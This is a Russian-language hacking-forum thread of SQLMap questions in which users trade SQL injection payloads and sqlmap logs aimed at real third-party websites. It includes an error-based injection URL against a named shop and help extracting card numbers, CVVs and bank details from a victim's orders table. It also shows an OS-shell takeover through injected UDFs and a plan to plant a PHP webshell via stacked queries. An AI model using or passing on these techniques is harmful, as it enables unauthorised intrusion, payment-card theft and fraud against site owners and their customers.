Вопросы по SQLMap

Discussion in 'Уязвимости' started by randman, 1 Oct 2015.

  1. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    828
    Likes Received:
    815
    Reputations:
    90
    masterdolicjakov
    sinfo
    религия не позволяет включить дебаг в sqlmap и посмотреть какие запросы не работают?
     
    _________________________
  2. masterdolicjakov

    masterdolicjakov New Member

    Joined:
    17 Sep 2016
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Доброго вам дня!
    Извините, можно поподробней?
     
  3. sinfo

    sinfo Member

    Joined:
    3 Oct 2016
    Messages:
    21
    Likes Received:
    5
    Reputations:
    0
    [12:47:12] [INFO] testing MySQL
    [12:47:12] [PAYLOAD] -8319
    [12:47:21] [WARNING] reflective value(s) found and filtering out
    [12:47:21] [DEBUG] searching for error chunk length...
    [12:47:21] [PAYLOAD] -8315) OR 1 GROUP BY CONCAT(0x7170627071,(SELECT REPEAT(0x34,1024)),0x716b767a71,FLOOR(RAND(0)*2)) HAVING MIN(0)#
    [12:47:51] [WARNING] turning off pre-connect mechanism because of connection time out(s)
    [12:47:51] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request(s)
     
  4. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    PHP:
     http://vapenw.com:80/catalogsearch/result/?cat=-3835)+ and extractvalue(0x0a,concat(0x0a,(select database()))) +--+-&product_finished=52&q=1&rating=2
     
    t0ma5 likes this.
  5. sinfo

    sinfo Member

    Joined:
    3 Oct 2016
    Messages:
    21
    Likes Received:
    5
    Reputations:
    0
    А как в мапе раскрутить?
     
  6. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    хз
     
  7. androd

    androd Banned

    Joined:
    16 Sep 2016
    Messages:
    19
    Likes Received:
    1
    Reputations:
    2
    Помогите решить проблему.
    У меня есть таблица
    Table: order_master_admin
    [55 columns]
    +-------------------------+--------------+
    | Column | Type |
    +-------------------------+--------------+
    | timestamp | varchar(100) |
    | address_1 | varchar(255) |
    | address_2 | varchar(255) |
    | bank_acc_hold_name | varchar(50) |
    | bank_acc_no | varchar(16) |
    | bank_cheque_no | varchar(5) |
    | bank_name | varchar(50) |
    | bank_route_no | varchar(10) |
    | cc_cust_name | varchar(50) |
    | cce_month | varchar(2) |
    | cce_year | varchar(4) |
    | ccno | varchar(16) |
    | city | varchar(255) |
    | comment | blob |
    | country | varchar(255) |
    | cvv_no | varchar(3) |
    | date_modified | datetime |
    | dob | varchar(50) |
    | email | varchar(100) |
    | fingerprint | varchar(255) |
    | first_name | varchar(50) |
    | invoice_id | varchar(50) |
    | ipaddress | varchar(50) |
    | language_id | int(11) |
    | last_name | varchar(50) |
    | mobile | varchar(255) |
    | notify | int(2) |
    | notify_date | datetime |
    | order_id | varchar(50) |
    | order_status_id | varchar(100) |
    | order_time | datetime |
    | password | varchar(50) |
    | payment_address_format | blob |
    | payment_mode | varchar(50) |
    | payment_status | varchar(50) |
    | phone | varchar(255) |
    | return_code | varchar(10) |
    | return_message | varchar(50) |
    | ship_amount | varchar(25) |
    | ship_type | varchar(100) |
    | shipping_address1 | varchar(50) |
    | shipping_address2 | varchar(50) |
    | shipping_address_format | blob |
    | shipping_city | varchar(50) |
    | shipping_country | varchar(50) |
    | shipping_firstname | varchar(50) |
    | shipping_lastname | varchar(50) |
    | shipping_pin | varchar(50) |
    | shipping_state | varchar(50) |
    | state | varchar(255) |
    | total_amount | varchar(100) |
    | transaction_id | varchar(100) |
    | userid | varchar(50) |
    | userlevel | varchar(50) |
    | zipcode | varchar(255) |
    +-------------------------+--------------+
    При дампе мне нужно сдампить только эти поля
    | ship_amount | varchar(25) |
    | ship_type | varchar(100) |
    | shipping_address1 | varchar(50) |
    | shipping_address2 | varchar(50) |
    | shipping_address_format | blob |
    | shipping_city | varchar(50) |
    | shipping_country | varchar(50) |
    | shipping_firstname | varchar(50) |
    | shipping_lastname | varchar(50) |
    | shipping_pin | varchar(50) |
    | shipping_state | varchar(50) |
    И нужно что бы дамп был не с начало в конец,а с конца в начало.
    Тоесть там 100к строк,мне нужен дамп с 95К строки как это сделать?
     
  8. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    828
    Likes Received:
    815
    Reputations:
    90
    есть параметр where
    Code:
    python ../sqlmapproject-sqlmap-ad612bf/sqlmap.py --help | grep where
        --where=DUMPWHERE   Use WHERE condition while table dumping
    
    берешь бубен и пляшеш)

    Code:
    -C COL              DBMS database table column(s) to enumerate
    
    это на тему колон

    "Тоесть там 100к строк,мне нужен дамп с 95К строки как это сделать?" учить как работают лимиты в мускуле думаю никто не будет -_-
     
    _________________________
  9. sinfo

    sinfo Member

    Joined:
    3 Oct 2016
    Messages:
    21
    Likes Received:
    5
    Reputations:
    0
    Пробую слить в дампере,сливает но туго(.Мап выдает вот такое

    [13:30:30] [INFO] the back-end DBMS is Microsoft SQL Server
    web server operating system: Windows 8.1 or 2012 R2
    web application technology: ASP.NET, Microsoft IIS 8.5, ASP
    back-end DBMS: Microsoft SQL Server 2008
    [13:30:30] [INFO] fetching columns for table 'Master' in d
    atabase 'cation'
    [13:30:30] [INFO] the SQL query used returns 54 entries
    [13:30:30] [INFO] starting 10 threads
    [13:30:31] [INFO] fetching entries for table 'tMaster' in d
    atabase 'cation'
    [13:30:31] [INFO] resumed:
    [13:30:31] [INFO] fetching number of entries for table 'Master
    ster' in database 'master'
    [13:30:31] [INFO] retrieved:
    [13:30:31] [WARNING] multi-threading is considered unsafe in time-based data ret
    rieval. Going to switch it off automatically
    [13:30:31] [WARNING] (case) time-based comparison requires larger statistical mo
    del, please wait.............................. (done)
    [13:30:36] [WARNING] it is very important to not stress the network connection d
    uring usage of time-based payloads to prevent potential disruptions

    [13:30:37] [WARNING] in case of continuous data retrieval problems you are advis
    ed to try a switch '--no-cast' or switch '--hex'
    [13:30:37] [WARNING] unable to retrieve the number of entries for table 'Master' in database 'cation'
    [13:30:37] [WARNING] HTTP error codes detected during run:
    500 (Internal Server Error) - 38 times
     
  10. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    398
    Likes Received:
    38
    Reputations:
    1
    Ребят какие команды у сшела на sqlmap
    Как залить норм shell
    Code:
    [18:27:05] [INFO] fingerprinting the back-end DBMS operating system
    [18:27:05] [INFO] the back-end DBMS operating system is Linux
    [18:27:06] [INFO] testing if current user is DBA
    [18:27:06] [INFO] fetching current user
    [18:27:07] [WARNING] reflective value(s) found and filtering out
    [18:27:07] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
    [18:27:07] [WARNING] functionality requested probably does not work because the curent session user is not a database administrator
    what is the back-end database management system architecture?
    [1] 32-bit (default)
    [2] 64-bit
    >
    [18:27:09] [INFO] checking if UDF 'sys_eval' already exist
    [18:27:10] [INFO] checking if UDF 'sys_exec' already exist
    [18:27:11] [INFO] detecting back-end DBMS version from its banner
    [18:27:11] [INFO] retrieving MySQL plugin directory absolute path
    [18:27:12] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ' in 'where clause'
    [18:27:12] [INFO] resumed: /usr/lib/mysql/plugin/
    [18:27:39] [WARNING] time-based comparison requires larger statistical model, please wait........................ (done)
    [18:27:53] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path)
    [18:27:54] [ERROR] there has been a problem uploading the shared library, it looks like the binary file has not been written on the database underlying file system
    do you want to proceed anyway? Beware that the operating system takeover will fail [y/N] y
    [18:27:58] [INFO] creating UDF 'sys_eval' from the binary UDF file
    [18:27:59] [INFO] creating UDF 'sys_exec' from the binary UDF file
    [18:28:01] [INFO] going to use injected sys_eval and sys_exec user-defined functions for operating system command execution
    [18:28:01] [INFO] calling Linux OS shell. To quit type 'x' or 'q' and press ENTER
    os-shell>
    ссылка на скриншот http://i78.fastpic.ru/big/2016/1011/51/95e59ecf6cd1aaa9d13c2654e755fd51.png
     
  11. LeninDie

    LeninDie Member

    Joined:
    26 Dec 2015
    Messages:
    72
    Likes Received:
    8
    Reputations:
    2
    вроде как нашлась скуля
    скриншот: http://ipic.su/img/img7/fs/kiss_16kb.1476215719.png
    но когда пытаюсь крутить скульмапом то нифига не выходит. уже и полный запрос делал как в программе - через файл и командой -r. оригинальное значение mailid=7581, sqlmap.py -u "https://host/file.php?mailid=7581" --cookie="blablabla" -p mailid --dbms=mysql --level=5 --risk=3 --current-db - так ведь верно запрос составлен?! сервис mysql - висит на сервере. подскажите куда копать, может что делаю не так? во время проверки пишет что параметр возможно уязвим но в итоге false positive
     
    #271 LeninDie, 11 Oct 2016
    Last edited: 11 Oct 2016
  12. sinfo

    sinfo Member

    Joined:
    3 Oct 2016
    Messages:
    21
    Likes Received:
    5
    Reputations:
    0
    false positive - это нормально
     
  13. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    398
    Likes Received:
    38
    Reputations:
    1
    --dbms ? может --dbs
     
  14. sinfo

    sinfo Member

    Joined:
    3 Oct 2016
    Messages:
    21
    Likes Received:
    5
    Reputations:
    0
    У меня вопрос,пытаюсь слить бд.Но в ней присутствуют слова на кирилице,и в дампе это выглядет вот так ???????.Что можно сделать?

    --charset=windows-1251 не помогает(

    Если hex то \xec\xe0\xf0\xea\xe5\xf2\xee\xeb\xee\xe3
     
    #274 sinfo, 11 Oct 2016
    Last edited: 11 Oct 2016
  15. passwd

    passwd New Member

    Joined:
    23 Dec 2010
    Messages:
    78
    Likes Received:
    2
    Reputations:
    5
    Подскажите как проще всего раскрутить Stacked Queries?
    ---
    Parameter: q (GET)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: q=123';WAITFOR DELAY '0:0:5'--&c=123
    ---

    Базы вытаскивает очень долго. Быть может можно найти значение в базе, которое отображается на странице и сделать UPDATE этого значения добавив "<?php system($_GET["cmd"]); ?>", а затем и шелл залить? Каков вообще вектор раскрутки Stacked Queries если нет доступа к админке (к тому же current user is DBA: False)?
     
  16. Metal0l

    Metal0l New Member

    Joined:
    18 Oct 2016
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    подскажите пожалуйста как раскрутить скулю такого типа: http://site.ru/search?search_id=activetopics+AND+1=1+--+
    Получил ее путем скана сайта в ZAP. Что только не перепробовал и повышал risk, level. Заранее спасибо
     
  17. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    828
    Likes Received:
    815
    Reputations:
    90
    что конкретно не получается?
     
    _________________________
  18. Metal0l

    Metal0l New Member

    Joined:
    18 Oct 2016
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Не получается получить доступ к БД.
     
  19. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    828
    Likes Received:
    815
    Reputations:
    90
    это понятно, получилось бы - вы бы сюда не писали

    http://site.ru/search?search_id=activetopics+AND+1=1+--+
    http://site.ru/search?search_id=activetopics+AND+1=2+--+

    информация на странице различается?
    вообще слабо верится что тут есть инъекция, ибо не вижу внедрения в запрос, строковое значение всяко должно быть в каких либо кавычках/аппострофах, возможно просто синтаксис поиска поддерживает логические операторы и сканер просто ошибся
     
    _________________________
    Metal0l likes this.
  20. Metal0l

    Metal0l New Member

    Joined:
    18 Oct 2016
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Да, честно говоря тоже сетовал на ошибку сканера. Информация различается. У меня выводит сообщение о неопознанной ошибке, и просит обратиться к администратору сайта.